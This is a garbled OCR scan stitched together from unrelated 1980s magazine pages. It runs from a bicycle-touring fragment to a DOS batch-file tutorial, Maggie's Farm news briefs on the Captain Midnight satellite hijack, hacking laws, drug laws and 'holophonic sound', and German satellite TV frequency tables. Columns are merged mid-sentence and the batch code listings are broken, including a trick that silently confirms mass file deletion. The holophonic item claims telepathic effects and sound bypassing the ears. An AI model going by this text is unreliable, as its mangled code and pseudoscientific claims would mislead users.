full-time research and subsequent storytelling. F o r a c o n f i r m e d generalist, t h e c o m bination is so addicting t h a t ending t h e j o u r n e y may be impossible. I ' m o f t e n asked h o w far, h o w fast, h o w m a n y states, h o w long. T h e f r e q u e n t questions along these g o a l - o r i e n t e d n u m e r i c a l lines a r e hard t o a n s w e r p r o p e r l y o n t h e s t r e e t : I a m h e r e . Period. T o m o r r o w I might be s o m e w h e r e else (probably f u r t h e r south since it's w i n t e r ) , b u t m a y b e I'll still be h e r e w h o knows? If y o u think t o o m u c h a b o u t w h e r e y o u ' r e going, y o u lose r e s p e c t f o r w h e r e y o u are. Wherever you are, m d wherever I am, we're neighbors In dataspace. II you want to talk about It (or add yourself to my hospitality database), I can be reached through my home network addressed at "wordy." (For GEnie sign-up into, call BOO-638-9636.) I also check Into CompuServe every lew weeks (my id there Is 72757, 15) and have just begun tentative long-distance eiptontlon ol The W E I L (again, as "wordy." Dial 415-332-6106). Throw another logon.
Jinis Miglaus

THE BIKE ITSELF


Everything d e s c r i b e d so f a r has t o b e light, p r o t e c t e d f r o m vibration, k e p t dry even in t h e nastiest w e a t h e r , and easy t o repair o n t h e r o a d . T h o s e requirem e n t s are added t o an already stringent set o f d e m a n d s o n t h e bicycle, f o r t h e t o t a l system (including m y b o d y ) weighs 4 0 0 pounds. I t must b e pedaled up steep grades y e t s t o p quickly; it must n o t oscillate u n d e r any conditions; it must w i t h s t a n d t h e o n g o i n g abuses o f w e a t h e r and g r i m e and shock and salt and o v e r l o o k e d m a i n t e n a n c e . I t had t o be a r e c u m b e n t , o f c o u r s e . Long-distance t o u r i n g w h i l e hunched o v e r o n e o f t h o s e old-fashioned d i a m o n d f r a m e machines has always s e e m e d masochistic, a ritual pursuit t h a t drives aesthetics t o t h e m o s t r e m o t e fringes o f a traveler's awareness. People can o v e r c o m e a l m o s t anything, but w h y subm i t willingly t o hundreds o f hours o f acute d i s c o m f o r t ! T h e r e c u m b e n t riding position n o t only allows g r e a t e r p o w e r t o t h e pedals, b u t also eliminates all t h e traditional cycling sore spots (shoulders, n e c k , c r o t c h , and

WHOLE EARTH REVIEW

SPRING 1987

27 GATE FIVE R O A D

SAUSALITO. C A 9496S

Batch magic
DOS batch processina is notoriously slow, but it does have its uses. John DeHaven provides a compendium of tricks, techniques and curiosities for your reference.
ment, they may be combined; and driver, I can't imagine anyone w i t h What is the world's slowest inter3 Statements with the same argu- more than 16k of RAM not w a i i t i n g pretative language? This dubious ment may also be combined with this, because it allows control over honour surely belongs to DOS batch screen colours and attributes, arbitstatements with no argument. processing, which runs like granny. Here are some examples to illus- rary cursor positioning and e v e n Let's go ahead and stretch a point keyboard reassignment (16-character trate the above points: and call DOS batch processing a lankeyboard macros at the DOS level FOR %%A IN (CLS VER VOL BREAK guage. It is useful to think of the without a fancy program!) VERIFY SET) DO %%A statements of this language as inIf you are echoing many lines t o FOR %%A IN (CLS A: ECHO PAUSE cluding the traditional batch procesthe display, you will find that it is CLS) DO %%A Insert back-up sing commands, all DOS commands much faster to put in a single line t o diskette and the names of any executable TYPE a file that contains your m u l t i FOR %%@ IN (CLS C: IF A:) DO files (including other batch files) that line display. This will cost some disk %%@ EXIST PP. BAT PP are available in the default directory space, since you will have to create FOR %%@ IN (MD CD) DO %%@ or via PATH. this extra file. I usually denote such \ SDIR1 Unfortunately, even if we generThese work because certain com- files as .SCR (for 'screen') files. ously expand the definition in this If you use labels in a batch file, mands like CLS and PAUSE (and cerway, DOS batch processing still isn't tain other executable files you might those that are most likely to be called a complete language, since it is not have created) do not take any argu- should be put near the beginning, as interactive and cannot add or even ments, so when FOR expands them the batch processor scans the entire count. Even so,if you hold your jaw a with an argument, the argument is file f r o m the beginning every t i m e it certain way there is plenty of unsuslooks for a label. ignored. pected power to be found. We'll exBatch files will run much faster if plore generation and passing of variyou allocate extra 'buffers' with Control ables, file creation, true calls with reCONFIG-SYS. Briefly, this specifica- Whether you use ANSI.SYS or n o t , turn, giant loops under control of tion allocates memory for disk I/O, the display understands the sequ'FOR' and recursion. Batch procesone buffer per cluster read from dis- ence ESC-(-2-J to mean 'clear t h e sing is not really as boring as IBM kette. When a disk call is made, these screen'. The CLS command in fact and Microsoft try to make it seem. buffers are checked first, and if the sends just this sequence to t h e The traditional (IBM/Microsoft) disrecord is already here, no physical screen. This means that you can incussion lists only six batch procesdisk reference will be made. The clude this string in any statements sing commands, and we'll assume overhead cost is about 1k per buffer you ECHO to the display and in a n y vou have a working knowledge of (not 512k as IBM states), above the file that you might TYPE to the disthese: ECHO, FOR, GOTO, IF, PAUSE, default two buffers. Here is how you play. If you write your batch f i | e s REM and SHIFT. Of these, ECHO is can be sure you have those extra with an editor that allows the inseruseful outside of batch processing, buffers activated: tion of the ESC code, you w i l l be and FOR can be used outside batch 1 The disk from which you boot able to echo ANSI control sequences processing to do some non-trivial from the batch file. Some very nice must contain a file called: things. Four other commands, COMeffects are available. If we let the ex'CONFIG.SYS.' MAND, CLS, EXIT and SET are not usually mentioned as part of batch 2 This file must contain the state- pression '*[' stand for the ESC code the sequence processing, although they would ment: CLS BUFFERS=9 rarely be used anywhere else. We will use them all here. although a larger number will be ECHO" [[2Jinstall the back-up diskette in drive A."G*[[5m OK PAUSE 3 For good measure, include the fol- ECHO "[[2K A [[0;1m lowing two lines: One reason batch processing runs so will clear the screen and display thi_ FILES=99 slowly is that it makes a disk call for prompt message followed by a beep DEVICE=ANS1.SYS each line of code. Evidently then, a and a blinking pause message. W h e n The first of these will allow a much a key is struck, the blinking pause given batch file will run faster if you larger number of file handles to be message is wiped out. can reduce the number of lines in it. After you have a batch file running, opened than the default eight, at a You could output blank lines w i t h you may be able to reduce the num- cost of only 3783 bytes of memory. ECHO followed by two or more Many programs need more handles spaces with DOS 2.x, but this no l o n ber of lines by combining some of them in a FOR structure. The follow- than eight, and you'll be dis- ger works with DOS 3.x. The sequappointed in the performance of ence ESC-space-<255h> w i l l work ing rules apply: 1 If statements have no argument, some of the following examples if with DOS 3.x, the idea being t o echo you don't allow this extra latitude. As the invisible character 255 hex. O n they may be combined; 2 If statements have the same argu- for the assignment of the ANSI.SYS

m e m

Speed

an IBM machine you can get this character if you hold the ALT key and press 2-5-5 on the numeric keypad. On other machines, or with certain editors, the procedure may be different. You may want to shut up the display at some stage. To do this you set ECHO OFF so that you won't see the batch procedure running, but certain commands still natter at you. The bit bucket 'file' NUL may be used for this. If your file contains the statement DEL\BAK>NUL then it will attempt to delete all backup files. If there are none, the error message will be redirected into the 97th dimension and will not be seen. You could also get the effect with the statement IF EXIST *.BAK DEL \ B A K but this would require a bit of extra time for the existence test. IF EXIST only works for files in the current drive and directory, which is sometimes a bother.

Variables
There are four kinds of variables in batch processing. %0 returns the name of the batch file itself while %1, %2, %3 represent tokens passed in on the command line after the name of the batch file. %%A, where 'A' may be any character, is the form of a variable that takes successive values of the 'IN' portion of a FOR statement. The usual literature does not make it obvious that a variable in the form %WORD% will return the value of a variable called 'WORD' that has been set into the 'environment'. To install such a variable, you execute a command, in or out of a batch file, of the form SET VAR=SOME STRING where VAR is the variable name, and the value is any string. To see how SET works, try the following batch program. ECHO OFF SET X=NOT ECHO THIS DOES %X% FAIL. SET X = ECHO THIS DOES %X% FAIL. These variables set into the environment are made available to all executable programs, and this is how they are accessed by .BAT programs. Often you may need to control batch file behaviour according to whether a variable exists or not (regardless of its value). The IF statement does not directly test for this; you must supply some minimal string on both sides of the ' = = ' operator. I'll use a minimal string of '@' to show the two basic kinds of existence tests. Executes if the variable %1 exists: IF NOT %1@==@ . . . Executes if the variable %1 does not exist: IF % 1 @ = = @ . - . .

Later we'll see some other uses for these techniques but, as an example, suppose you have a program that becomes memory-resident when called, and if called again will install another copy of itself, gradually eating up your available memory (some otherwise excellent commercial products have been known to behave like this). The program is not used every day, and is too large to install no matter what with AUTOEXEC.BAT. What you need is a batch program that calls this maverick program if it is needed, but only once per session. Let's suppose our resident-type program is called DBSORT. A batch file fragment that would do the trick might be: IF NOT %SORT%@= = INS@ DBSORT IF NOT %SORT%@= = INS@ SET SORT=INS After DBSORT is installed once, the variable SORT is set to INS in the environment and, therefore, DBSORT will not again be called until the machine is rebooted.

Creating a file with a batch file


The command 'ECHO This is a test message >TEST.TXT' will create a one-line file named TEST.TXT which contains the words This is a test message'. One reason to do this would be to set a flag that will last between sessions. Things set in the environment go away with the power, but a temporarily-created file will not, and its existence may be tested by the IF EXIST statement of batch processing. Your AUTOEXEC.BAT might want to set up a large print spooler if you have a dot-matrix printer installed, and omit the spooler if a daisywheel unit is attached. The following statement in AUTOEXEC.BAT would do it, based on the existence or not of a file called DAISY. IF NOT EXIST DAISY BIGSPOOU128 At some point in your configuration procedure you could create the flag file if required with the statement: ECHO Daisywheel printer installed>DAISY You can create a temporary file and then use the temporary file to answer a question. Two commands that are hard to automate are DEL and PRINT, because under certain conditions they ask questions of the user. The following batch sequences will proceed without pause: ECHO Y >YES DEL * > <YES ECHO LPT1 >PSPEC PRINT %1 <PSPEC DEL PSPEC In each case, if the procedure asks a question, it finds a file waiting with the answer, and it takes the answer from the file.

A multiple line file may be written a line at a time, by using the ' > > ' operator, which adds a line to a file. ' ' creates the file if it doesn't yet exist. The following sequence writes a three-line file (try it). DEL TEMP ECHO This is the first line TEMP ECHO This is the second line TEMP ECHO This is yet another line TEMP TYPE TEMP You could even write another batch file this way and then execute it! Here is how to create a program that keeps an activity log. First create a file that contains only a carriage return and a line feed by the following procedure: COPY CON CRLF.BAT <return> <return> <CTRL-Z> <return> We've named this weird little file CRLF.BAT because there is another important use for it that we'll discover below. One use for this will come clear if you try DATE cCRLF.BAT and then DATE <CRLF.BAT >LOG TYPE LOG This, then, would be your activity log program fragment. It records a date and time in file LOG whenever it runs: DATE <CRLF.BAT L O G TIME CCRLF.BAT L O G For maximum speed we compress this to: FOR %%@ IN (DATE TIME) DO %%@ cCRLF.BAT L O G You could also use this technique to put data in a file. Below we will see how a batch file could read such data.

Chaining
As is well-known, if you name another batch file in a batch file, the next batch file begins executing. In this way batch files may be chained. This chaining can be used to cause an abrupt exit from a long batch file that runs slowly. Suppose the batch file has the following structure: :LABEL1 cFIRST PROCEDURE> GOTO EXIT :LABEL2 cSECOND PROCEDURE GOTO EXIT

:LAST LABEL cLAST PROCEDURE> :EXIT This is likely to execute slowly because after any given procedure is executed, EXIT is called and the batch processor must read the whole file from the beginning to find the

PROGRAMMING
label in the very last line. If the donothing file CRLF.BAT is still available to DOS, the preceding program may be considerably speeded up by writing it in the following form: :LABEL1 <FIRST PROCEDURE> CRLF ;LABEL2 <SECOND PROCEDURE CRLF DO %%@ LOOP Soon we'll see a more advanced application of this principle. You can also use the command-line tokens as items to be counted. Write TEST.BAT: ECHO OFF CLS echoed. When DLOAD is called w i t h arguments, the first variable is set t o %DSN% for later use by < d o w n l o a d procedure>, then is shifted a w a y . The second variable (now %1) is stored as %DIR% and then creates the desired subdirectory before banishment by shifting. The ' m e m bers' are shifted in turn into p o s i t i o n %1 by the loop, until they are all used up. Exits f r o m the p r o g r a m a r e by fast calls to CRLF.BAT, w h i c h w a s created earlier. If the attempt t o make the subdirectory fails, p e r h a p s because the subdirectory already exists, the resulting error message w i l l be shunted off to NUL.

:DO

:LASTLABEL <LAST PROCEDURE> Now, instead of searching the file for " :EXIT", the program will directly chain to CRLF and abruptly quit.

ECHO Display for token %1 SHIFT IF NOT % 1 @ = = @ GOTO DO Run TEST with several calls to see this work. TEST TEST 1 2 3 TEST X X X TEST NOW THREE WORDS TEST 1 TWO 3 2 + 2 5 6 7 8 9 TEN 11

Menus
Fig 1 shows a program to c o n t r o l some settings for an Epson/IBM-type printer. It will display a menu if called without argument, but this m e n u may be bypassed if the user k n o w s what to enter.

Using SHIFT
There are two good uses for the SHIFT command: to allow an indefinite number of command line parameters and to count. Suppose you have a print formatter called PRT.COM. You could feed several files to it with a batch file containing the following: FOR %%@ IN(%1 %2 %3 %4 %5 %6 %7 8% 9%) DO PRT %%@ This is fast enough, but is limited to nine arguments. This little program will accept unlimited arguments, using SHIFT: DO IF % 1 @ = = @ GOTO ENDDO PRT %1 SHIFT GOTO DO :ENDDO or quicker: :PROC IF % 1 @ = = @ GOTO ENDPROC PRT %1 FOR %%@ INfSHIFT GOTO) DO %%@ PROC :ENDPROC This Is the most general f o r m that will not execute if there are no arguments. A shorter (and therefore faster) version of this basic loop may be used, but this f o r m will execute at least once, even if there are no arguments. Use it by all means if this does not matter. .LOOP PRT %1 SHIFT IF NOT %1@ = = @ GOTO LOOP or quicker: :LOOP PRT %1 FOR %%@ IN(SHIFT IF) DO %%@ NOT %1@= = @ GOTO LOOP If we can use CRLF.BAT to break out of the program, we can have the best of both worlds. :LOOP IF %1@==@CRLF PRT %1 FOR %%@ IN(SHIFT GOTO)

Batch

procedures

You may want to create a complex batch file to automate an obnoxious procedure, but perhaps you don't use it often enough to remember its complex call syntax. The answer to this is to set the batch file up so it will give you some instructions if called with no arguments. For example, here is the start of my batch program 'DLOAD.BAT' which permits unattended downloading of partitioned datasets from the IBM mainframe, a procedure that could take hours. The actual download procedure is so slow that batch file speed is a negligible factor, so nothing is compressed into FOR loops here. ECHO OFF CLS IF NOT /<Tl@==@GOTO START ECHO DOWNLOAD PARTITIONED DATASETS FROM MAINFRAME ECHO ECHO SYNTAX: DLOAD DSN DIR MEMBER1 MEMBER2 MEMBER3... ECHO Where DSN is the fully qualified dataset name, ECHO DIR is the destination subdirectory. ECHO and MEMBERn are any number of member names. CRLF .START SET D S N = % 1 SHIFT SET DIR = %1 FOR %%@ IN(MD SHIFT) % % @ \ % 1 MD \ % 1 > N U L SHIFT

Calling batch files

Now we will see how we can call another batch file and return f r o m it, as though it were a subroutine. If you chain to another batch p r o g r a m , that's it there Is no return. T h e secret of true calls is the ' C O M MAND' statement. 'COMMAND' loads another c o p y o f part of COMMAND.COM into m e m ory and gives it control. This d o e s not consume as much m e m o r y as IBM would have you believe, since it does not load another copy of t h e whole 28k or 40k COMMAND.COM it only loads another copy of t h e command processor which is a b o u t 4k. The new c o m m a n d processor runs quite independently of the p r e vious one. The command 'EXIT' purges t h e currently executing c o m m a n d p r o cessor and puts you back to t h e p r e vious one. EXIT does nothing if e n tered into the one and only o r i g i n a l command processor. It is not obvious what the use of this is until y o u remember file redirection. What happens if the n e w command processor takes its input f r o m a file? Try it by making a f i l e full of commands, ending w i t h EXIT We'll call it GIZMO. (If y o u d o n ' t e n d this file with EXIT you'll never r e t u r n ; the computer w i l l hang up for good )' VOL ECHO This line is f r o m :D0 the called file. IF % 1 @ = = @ CRLF VER < D 0 W N L 0 A D PR0CEDURE> EXIT SHIFT Next create DR1VE.BAT and r u n i f GOTO DO . ECHO OFF Several techniques are used in this CLS program. If DLOAD is entered with ECHO This line is f r o m no arguments, the first IF statement the main program. detects this, and the instructions are

PP.BAT ECHO OFF CLS IF NOT % 1 @ = = @ GOTO %1 ECHO Enter PP E for elite ECHO PP W for wide ECHO PP B for BOLD ECHO PP R to reset printer CRLF :E ECHO " ( M * [ T G >PRN CRLF ECHO *[P >PRN CRLF

PP P for pica PP C for condensed PP D for doublestrike

:P

Fig 1 COMMAND <GIZMO ECHO This line is again from the main program. This illustrates the general principles. We can vastly improve on this, though. The special form: COMMAND/C string says, in effect, to invoke a new command processor, feed it 'string' as an input command, execute the command, then EXIT. If we feed a command processor a batch file name, it executes the batch file. Because of this we can rename GIZMO to GIZMO.BAT and drop the EXIT command from the end, thereby converting it into a plain vanilla batch file. Change DRIVE.BAT as follows: ECHO OFF CLS ECHO This line is from the main program. COMMAND/C GIZMO ECHO This line is again from the main program. This is almost the effect we want. We are spared the installation message from the command processor, but the secondary command processor echoes everything. Even if you put ECHO OFF at the beginning of GIZMO.BAT it will still echo the first prompt and the ECHO OFF. If it is really important to silence everything, you can use redirection. Change the programs as follows: GIZMO.BAT: VOL >CON ECHO This line from the called file. >CON VER >CON DRIVE.BAT: ECHO OFF CLS ECHO This line from the original batch program COMMAND/C GIZMO > N U L ECHO This line again from the called program The trick here is to send all output from the secondary command processor into NUL. Then we override this in the called batch file with redirections to CON for everything we really want to see. (More examples on this are given below.) This call/return procedure can be nested to any depth that your memory allows, and you can play tricks with variables. Try these three batch programs. MAIN.BAT ECHO OFF CLS ECHO MAIN here. Are you watching? COMMAND/C SUBFILE1 file speak sub %1 > N U L ECHO Whew! We made it back to MAIN again. SUBFILE1.BAT ECHO This is %3%1 1 %2ing. CON COMMAND/C %3%12 %1 %2 %3 %4 ECHO Goodbye from %3%1 1. >CON SUBFILE2.BAT ECHO Now %3%1 2 %2s. >CON IF NOT %4@==@ ECHO What does " % 4 " mean? >CON Try launching this collection with 'MAIN' and 'MAIN AXOLOTL'. More practically, suppose I have a lot of programs to download from the mainframe with DLOAD.BAT. What I want are several members from each of several partitioned datasets. This whole procedure might take all night I plan to submit a huge metabatch file when I go home in the evening. I can create a driver for DLOAD.BAT and off we go: COMMAND/C DLOAD BNW.TE.CLIST TECLIST M1 M2 M3 M4 . . . COMMAND/C DLOAD BNW.TE.SAS TESAS M1 M2 M3 M4 . . . COMMAND/C DLOAD BNW.TE. TABLES TETABLES M l M2 M3 M4 . . . If nothing goes horribly wrong, I should return in the morning to find the selected members neatly copied into appropriate subdirectories.

Recursion
By now you may be saying 'All that is very well, but if a batch file can be made to call another file, what w o u l d happen if you asked it to call itself or maybe call another batch file that called the first one, or m a y b e . . . '

Being of an inquisitive nature I explored some of these questions. The answer, in general, is that you can have any number of recursive chains or calls, so long as memory and file handles are available. If you are careful of counts and end conditions, you won't get in too much trouble. On the other hand, if one of these were to run away . . . To ease into this subject, we'll consider recursive chaining first. Recursive chaining is an alternative to SET that initialises variables for further use by the program. The difference is that this way the program sets %1 through %9, so an operation like SHIFT might be used against them. Nothing fancy is needed for recursive chaining. Consider a file called CHAIN.BAT: ECHO OFF CLS IF % 1 @ = = @ CHAIN 1 2 3 4 5 6 7 8 9 :D0 ECHO <DO SOMETHING WITH FILE%1> SHIFT IF NOT %1@==@ GOTO DO Here is a catalogue printer for your hard disk. Your various subdirectories are 'remembered' in the recursive call statement. CAT. BAT ECHO OFF CLS IF % 1 @ = = @ CAT DBASE LOTUS ORD WRKC CD\ DIR | SORT >PRN :LOOP DIR \%1 | SORT >PRN FOR %%@ IN(SHIFT IF) DO %%@ NOT % 1 @ = = @ GOTO LOOP CAT.BAT will print catalogues for any arbitrary' selection of directories if called like this: CAT DIR1 DIR2 DIR3 . . . Suppose you have a file card ACTION.DATA which expects to find data in the form of tokens in a file called DATA. BAT. Possibly DATA.BAT was generated by another program which could be another or even this batch file. DATA.BAT contains a statement as follows: ACTION DATA1 DATA2 DATA3 . . . ACTION.BAT starts as follows: IF % 1 @ = = @ DATA As we can see, if ACTION.BAT is called with no arguments, it will immediately chain to DATA.BAT which calls ACTION right back, passing DATA1, DATA2, DATA3 . . . to it as %1,%2, % 3 . . . So far I haven't been able to think of something I needed to do with batch processing that couldn't be done more easily some other way. No doubt the Lisp-wallahs out there will immediately think of several important applications. On the other hand, this may be one of those case which vividly illustrates the difference between what you get away with and what's useful. gjjj]
Quelle unbekanm
NI

MIDNIGHT MARAUDER

American executives called it "video terrorism' but there was no denying a champion of the citizens had been born. John MacDougall 2 5 , of Florida, alias Captain Midnight, patched a 4Vz minute message onto a Home Box Office movie beamed to American viewers via a Hughes Communications satellite. ,, Appropriately, the message came across tne broadcasting on April 2 7 t h , 1986 of the movie The Falcon and the Snowman, which dealt with security penetration of classified information by the American Soviet agent Christopher Boyce. Captain M i d n i g h t ' s s t a t e m e n t was a w a r n i n g : his brief message,that h o m e satellite viewers w o u l d f i g h t back, sent chills d o w n t h e spine of every broadcast e x e c u t i v e in t h e c o u n t r y .

SatelliteJamminoFOP Fun, Profil, M


Massive a m o u n t s o f sensitve A m e r i c a n D e f e n s e D e p a r t m e n t i n f o r m a t i o n was carried a l o n g t h e same c o m m e r c i a l satellite n e t w o r k s t h a t M a c D o u gall exposed as vulnerable t o c o m p u t e r h a c k e r s , pranksters or satellite saboteurs. M a c D o u g a l l h a d instigated his message f r o m a c o m m e r c i a l b r o a d cast f a c i l i t y - m a k i n g n o t o n l y H B O or H u g h e s e x ecutives b u t defence o f f i c i a l s even m o r e a n x i o u s . If M a c D o u g a l l had chosen t o p o i n t his a n t e n n a at a Pentagon satellite instead, t h e i A m e r i c a n m o n - i t o r i n g of those channels m i g h t have assumed t h a t the Soviets were a b o u t t o f i r e t h e i r b o m b s a n d were t a k i n g t h e first step b y j a m m i n g US a b i l i t y t o retaliate. via M o t h e r Jones O c t . ' 8 6

A meeting of Federal and State attorneys-general in March will outline new laws which will render computer hacking an offence. Their ; i m will be to stop people interfering with data bases. At present it is an offence to physically damage a computer system but tampering with the information inside a computer's memory has not been covered by law. A working party has been operational since November to look into computer crimes/law. This was done after a report by the Tasmaniar, Law Reform Commission was presented to a meeting of Attorneys-General. A recent case In Perth involved Donald McLeod w h o programmed the Australian Bureau of Statistics computer to dump its memory store.

Clou. Ver/ dose.^


ftu -{ry ajai

Western Australia some mystery surrounds French uranium leach mining. The French energy giant. Total has been extracting yellowcake from vast uranium deposit near Onslow using the environmentally destructive method of solution mining. The French have exported tonnes of yellow cake from their Manyingee prospect. Uranium "exploration" licence in W.A. apparently means tests, trials, yellow cake production and export. But such severe damage has been inflicted by solution mining that State Parliament is looking at legislation for environmental protection by banning solution mining f For more info CONTACT: Shyam a Peeye.. Box_?89_Kalg "

' t h e encT of Q c t i b ^ i q" u ? . eensland brought in some o f the toughest drug laws in the West em World. Under the Drugs Misuse A c t ^ possession of two grams o f her ^ oin or cocaine or 0.004 of a gram j , of LSD carries a m a n d a t o r y | i f e T ' sentence. The extraordinary draconian , legislation stipulates the s a m e * sentence for t r a f f i c k i n g and gives police wide powers to tap private * phones. ^

People in possession o f 5 0 0 M grams of cannabis can be jailed , ims for life.

He was fined $200 after admitting his 'prank' to Federal Police stating that he knew there was a back up disc.

A F

IM g f c Q M B S K B

itkt

M A G G I E ' S F A R M A l t e r n a t i v e N e t w o r k Magazine - Issue 35 1 9 8 7

> <

the "Feelies" of the future?

Iioloplioiuc ouub
N o t only does holophonic sound create a third-dimension sound environment, it triggers other sensory modalities as well. This extraordinary "synesthesia" could launch a major new direction in brain research and herald t h a i entertainment of t h e brave new w o r l d , T h e " F e e l i e s " . For example, t h e sound of a match being struck elicts t h e smell of sulphur. A voice whispering close t o the ear is accompanied by a sensation of w a r m breath. T h e super reality of the perceived sound either triggers o f f c o m p l e m e n t a r y sensations, or other sensory " i n f o r m a t i o n " can also be encoded onto the frequn -cy phase waves directed t o t h e brain." Listeners typically describe the effect as "realer than real". It has a strange penetrating intens i t y . H o l o p h o n i c sound is apparently audible t o many hearing impaired individuals. Blind listeners report strong visual imagery. People wearing head-sets in groups together report surprising telepathic effects. Zuccarelli has approached sound recording f r o m a thorough knowledge of brain physiology rather than acoustics OF electronic engineering. If Zuccarelli's biologically-based technology allows for t h e encoding of more than sound, we enter a whole new realm of being able to replay a total experience. A future holophonic recording played on digital tape equipment could create its. own compelling enviro n m e n t . C O N T A C T : - Zuccarelli, 7 8 priory Rd, L o n d o n . N 8 .

A 26 year old Italian scientist living in L o n d o n has invented new sound technique that broadcasts a frequency pattern directly t o the brain, by-passing the ears altogther. Originally developed in research t o help t h e d e a f , holophonic sound is set t o be one of the major technological breakthroughs of the '80's that puts stereo, quad or any other conven -tional spatial effect very much in the kiddie's playpen division. " H o l o p h o n i c S o u n d " is in the patent process in nine European countries. C B S - U . K . w i l l soon release an album of holophonic sound effects. Major recording artists like Paul M c C a r t n e y and Peter Gabriel have approached the inventor H U G O Z U C C A R E L L I and his partner sound engineer, M i k e King. Zuccarelli believes t h e e a r / brain generates its o w n reference beam. Using a technique analogous t o t h e laser beam in holograms external sounds are recorded w i t h synthesized reference sounds. The brain provides its own second reference beam and "decodes" the holophonic record reproducing t h e original ambient conditions.

T h e total effect of a holophonic recording is like a multidimensional " p i c t u r e " created by phase interference patterns or, quite simply, sound.

I
M
S' <0, 5; ^ ^ ^ ]{

ELECTRIC
The Explosion of Community Radio C o u n t r y airwaves are suddenly alive w i t h the sound of music. The remarkable explosion of interest in c o m m u n i t y FM radio and participation media over the past t w o years has turned the FM dial in many local areas i n t o a " h o m e g r o w n " treat. Well over a thousand new c o m m u n i t y FM licences have been applied for putting most recent applicat* ions on an 18 m o n t h waiting list.With the new c o m m u n i t y radio station, 2RBMFM budding
r -, tk>>n

AIR WAVES
The rapid increase in citizen initiative networks and "alternative"media has Maggie's Farm blitzed by fresh data and publications f r o m all over the w o r l d always far more than can be collated i n t o one little magazine.

s
%

We checked in on a collective meeting at each station and discusscd program tapes " i n t e r swap" between c o m m u n i t y stations, as well as arranging for future Maggie's Farm radio pro* grams.

We have been looking at various ways of sharing this " o v e r s p i l l " i n , of excellent current news and ideas w i t h the network at large. ft* Even Maggie's interviews in the field, given broadcast q u a l i t y , can be shared on c o m m u n i t y radio, going into much more range and depth that print media allows.

V n a i r t K a U e / i n i a ' r

base in The Blue Mountains JiX first test broadcast in May-some jS, of the Maggie's crew visited Wi 2BOBFM in Taree and 2BBB FM in Bellingen t o swap notes.

As interaction between key network groups and blossoming <hI c o m m u n i t y radio develops, we can expect the rich variety of Sag " a l t e r n a t i v e " media and citizen ^ initiative groups t o lend much flavour t o the airwaves. ) -Editoral Collective J0

M A G G I E ' S F A R M Alternative N e t w o r k Magazine - Issue 3 5 - 1 9 8 7

SAT-TV-PROGRAMMTABELLEN

DIE SATELLITEN Ut

In der nachstehenden Tabelle wird auer der Original-SATAbstrahlfrequenz in GHz auch die erste Zwischenfrequenz im Zwischenfrequenzbereich 950 -1700 MHz und im Zwischgnfrequenzbereich 1284 - 1534 MHz (Telecom) aufgefhrt.

Dieses Programm wird ber den Ostbeam abgestrahlt und ist deshalb nicht in der gleichen Qualltat wie die anderen Programme zu empfangen Film Net", Premiere" und BBC" werden verschlsselt abgestrahlt. Sky Channel" momentan unverschlsselt. * spaltet den Transponder zeitweise auf, um zustzlich RAI-DUE" zu bertragen.

ipJfmm
Li

SAT-TV-PROGRAMMTABELLEN

D IHRE PROGRAMME
SE
u_ S?
Q3 T

u_

g <c LU hto i o in CO

So
LU cr ^ <C

I
C/J

1 <
CO -J LU 1z o> a; 5 m rv C M

s
^

GO Ll_

m Q
Q {=
"go

Q >

o O)

Die Weltkugel ist in dieser Grafik auf den Kopf gestellt, was Ihnen das Finden der einzelnen Satelliten erleichtern soll. Ausgehend vom Eutelsat 1 - F1 (ECS-1), der etwa im Sden steht, finden Sie den Intelsat VA - F12 links im Osten und den Intelsat VA F11 rechts im Westen.

SAT-TV-Programme mit Videotext


RAI U N O SKY C H A N N E L SUPERCHANNEL

o - noch nicht im Orbit * - Frequenzbereich 12.5 - 12.75 GHz * - Frequenzbereich 11.7 - 12.5 GHz

SKYTEXT SUPERTEXT

WDF-WEST3 BAYERN 3

BAYERNTEXT

= C-MAC/Tandberg

= SECAM

SAT-TV-PROGRAMMTABELLEN

DIE SATELLITEN UND IHRE PROGRAMME 1A 8 West Stereokanalpaarungen Telecom


Kml rt M

S e n d e f r e q u e n z (Trger) I n .! .: :-s *>


"I25M 126

-y

.-'MB

12522

...J-i.^-.-..

Die Weltkugel ist in dieser Grafik 'auf den Kopf' gestellt, was Ihnen das Finden der einzelnen Satelliten erleichtern soll.

- 2-3S Miz

- 2,70 HKz . 2,15 MHz - 3,60 Miz - 4,20 Mb - 4,95 Mb _ 5,35 Htz - 5,80 Mb - 6,20 m% _ 6,SO Ktz

c:
r'
L.

r
Frequenzbereich 12.5 12.75 GHz Nord

_ 6, SS mz f7 blaCJtee -

- 7,40 Miz 7,75 Ntz

Li

_ 6,20 Mtz

FERNSEHEN + RADIO BER DEN FRANZSISCHEN TELECOM-SATELLITEN 1A (12,5 -12,75 GHz)

. IKAL (KEIN POLARISER r 1 0 L J ^ r ^ n u ^ s a "RMTI ICHF AUSSTRAHLUNGEN VERTIKAL (KEIN POLARISER NOTWENDIG/LEDIGLICH F E E D H R l p ! : t ^ M -TELECOM 1A - .8, WEST,
FREQUENZ GHz TV/FERNSEHEN

TRANS-' PONDER NR

R1

12 522

M6 (Clips+Musik+Unterh. +Filme+Nachrichten) von ca. 10.00 - ca. 2.00 Uhr ca. 16 Stunden tglich Digitaler Business Service-Daten bertrag u ng LA CINQ (LA 5), (FILMPRG.) S von ca. 7.00 - ca. 1.40 Uhr ca. 18 Stunden tglich Trger fr rechts aufgefhrte Hrfunkprogramme

TONFREQUENZ I HRFUNKPROGRAMM TV-SOUND MHz w ' vsV " S J? V S 't I J V m AQUARELLE 5.800 RTL (FRANZ.) EUROPE 1

TONFREQUENZEN HRFUNK v MHz 6.200/7.400 6.500/7.770 6.850/8.200

R2J
i

t-

12.564 12.606

R3

5.800

EUROPE 2 AFP - AGENCE FRANCE PRESS (DATENBERTR.) RADIO NOSTALGIE PACIFIC FM SKY ROCK FUN FM RFM NRJ-RADIO ENERGIE RMC KISS FM * * Stereo - 1. Freq. links - 2. Freq. rechts

6.200/7.400 7.750 6.850/8.200 2.700/3.150 3.600/4.200 * * * 4.950/5.800 * * 2.350/5.350 * * 6.850/8.200 6.200/7.400 * * i 6.500/7.750 ' * * 2-sprachig 1. Freq. franz. 2. Freq. ita!.

R4

12.648

R5

12.690

Gelegentliche bertragungenA/ideo-bertragung

R6

12.732

bertragung digitaler Audio-Kanle * * * *

KISS (13/14)** RADIO FRANCE 1 (17/18) * * * ' RADIO FRANCE 2 (19/20) * * "

